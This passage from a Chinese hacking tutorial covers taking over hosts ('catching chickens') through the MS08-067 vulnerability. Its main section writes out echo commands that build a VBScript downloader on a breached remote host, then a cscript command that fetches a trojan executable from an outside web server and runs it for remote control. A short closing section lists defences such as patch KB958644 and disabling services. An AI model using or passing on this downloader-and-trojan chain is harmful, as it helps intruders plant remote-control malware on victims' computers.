网络安全 频道

风靡全球的Ms08-067漏洞抓鸡大曝光

  四、编写VBS脚本扩大战果

  尽管已经成功溢出,并且可以登录远程主机,但是命令行方式的操控,对于我们菜鸟来说,还是很不习惯的,所以得想方设法的将木马上传到远程主机并让其运行,方可直观操作。

  这里继续在远程主机输入命令,其建立脚本文件的命令如下:

  echo iLocal=Lcase(wscript.arguments(1))>wenpeng.vbe

  echo iremote=Lcase(wscript.arguments(0))>>wenpeng.vbe

  echo set xpost=createobject(“microsoft.xmlhttp”)>>wenpeng.vbe

  echo xpost.open “Get”,iremote,0>>wenpeng.vbe

  echo xpost.send() >>wenpeng.vbe

  echo set sget=Createobject(“adodb.stream”)>>wenpeng.vbe

  echo sget.mode=3>>wenpeng.vbe

  echo sget.type=1>>wenpeng.vbe

  echo sget.open()>>wenpeng.vbe

  echo sget.write(xpost.responsebody)>>wenpeng.vbe

  echo sget.savetofile ilocal,2>>wenpeng.vbe

  逐个执行完以上命令语句完毕后,此时就会在远程主机的当前目录下建立一个wenpeng.vbe的脚本文件。接下来将我们事先准备上传到空间的木马,下载到远程主机并执行即可,这里笔者木马存放的位置假设是http://www.show33.com:88/muma.exe,因此在远程主机里下载木马的命令,就应该是cscript wenpeng.vbe http:// www.show33.com:88/muma.exe wenpeng.exe。解释一下这句命令语句,cscript wenpeng.vbe代表执行wenpeng.vbe脚本,后面所跟的网址是想要下载的木马地址,wenpeng.exe则是木马下载后在本机的名称。执行脚本语句完毕后,输入wenpeng.exe回车后,即可使其木马文件在远程主机运行,此时你在利用本机的木马客户端程序与其服务端建立连接,就可非常直观的遥控这台肉鸡了。

  五、防范Ms08-067远程溢出攻击

  由于这个漏洞是致命的,所以一旦被入侵后果将不堪设想,因此我们可以微软的官方站点,下载编号为KB958644的补丁,对其漏洞进行修补。再则通过关闭Computer browser、server、workstation这三个服务关闭,也可防止黑客远程溢出攻击,当然安装防火墙将安全级别设置为高级,也是一种防止黑客入侵的不错选择。

2
相关文章